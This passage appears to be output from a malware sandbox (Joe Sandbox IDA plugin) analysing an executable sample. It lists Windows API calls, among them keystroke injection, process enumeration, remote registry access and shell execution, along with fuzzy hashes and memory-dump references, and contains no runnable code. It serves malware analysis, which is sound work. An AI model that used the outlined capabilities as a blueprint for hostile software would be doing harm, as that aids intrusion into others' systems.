                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3864802216-0
                                                                                          • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                          • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                                          • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                          • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                                          APIs
                                                                                          • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                            • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                            • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                            • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                          • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                            • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                          • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                            • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                          • ExitThread.KERNEL32 ref: 0041410F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                          • __freefls@4.LIBCMT ref: 00414135
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                          Similarity
                                                                                          • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                          • String ID:
                                                                                          • API String ID: 1925773019-0
                                                                                          • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                          • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                                          • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                          • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                                          APIs
                                                                                          • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                                          • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                                          • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                                          • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                                          • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                                          • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                                          • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                                          • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                                          Similarity
                                                                                          • API ID: ClearVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1473721057-0
                                                                                          • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                          • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                                          • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                          • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                                          APIs
                                                                                          • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                                                            • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                          • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                                                          • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                                                          • _memset.LIBCMT ref: 00464B92
                                                                                          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                                          • WSACleanup.WSOCK32 ref: 00464CE4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                                          • String ID:
                                                                                          • API String ID: 3424476444-0
                                                                                          • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                          • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                                          • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                          • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                                          APIs
                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem
                                                                                          • String ID:
                                                                                          • API String ID: 4116985748-0
                                                                                          • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                          • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                          • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                          • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConnectRegistry_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 535477410-0
                                                                                          • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                          • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                          • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                          • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                          APIs
                                                                                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                          • _memset.LIBCMT ref: 004538C4
                                                                                          • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                          • _wcslen.LIBCMT ref: 00453960
                                                                                          • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                                          • String ID: 0
                                                                                          • API String ID: 3530711334-4108050209
                                                                                          • Opcode ID: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                                          • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                                          • Opcode Fuzzy Hash: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                                          • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                          APIs
                                                                                          • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                          • String ID: HH
                                                                                          • API String ID: 3488606520-2761332787
                                                                                          • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                          • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                          • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                          • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                                          APIs
                                                                                            • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                            • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                            • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                          • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                          • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                          • LineTo.GDI32(?,?), ref: 004474BF
                                                                                          • CloseFigure.GDI32(?), ref: 004474C6
                                                                                          • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                          • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                          • String ID:
                                                                                          • API String ID: 4082120231-0
                                                                                          • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                          • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                          • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                          • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                          APIs
                                                                                            • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                            • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                            • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                          • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                          • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                          • LineTo.GDI32(?,?), ref: 004474BF
                                                                                          • CloseFigure.GDI32(?), ref: 004474C6
                                                                                          • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                          • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                          • String ID:
                                                                                          • API String ID: 4082120231-0
                                                                                          • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                          • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                                          • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                          • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                                          • String ID:
                                                                                          • API String ID: 288456094-0
                                                                                          • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                          • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                                          • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                          • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                                          APIs
                                                                                          • GetParent.USER32(?), ref: 004449B0
                                                                                          • GetKeyboardState.USER32(?), ref: 004449C3
                                                                                          • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                          • String ID:
                                                                                          • API String ID: 87235514-0
                                                                                          • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                          • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                                          • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                          • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                                          APIs
                                                                                          • GetParent.USER32(?), ref: 00444BA9
                                                                                          • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                                          • SetKeyboardState.USER32(?), ref: 00444C08
                                                                                          • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                                          • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                                          • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                                          • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                          • String ID:
                                                                                          • API String ID: 87235514-0
                                                                                          • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                          • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                                          • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                          • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                          • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                                          • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                          • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConnectRegistry_wcslen
                                                                                          • String ID: HH
                                                                                          • API String ID: 535477410-2761332787
                                                                                          • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                          • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                                          • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                          • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 00457C34
                                                                                          • _memset.LIBCMT ref: 00457CE8
                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                          • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                                          • String ID: <$@
                                                                                          • API String ID: 1325244542-1426351568
                                                                                          • Opcode ID: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                                          • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                                          • Opcode Fuzzy Hash: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                                          • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                          • __wsplitpath.LIBCMT ref: 004737E1
                                                                                            • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                          • _wcscat.LIBCMT ref: 004737F6
                                                                                          • __wcsicoll.LIBCMT ref: 00473818
                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
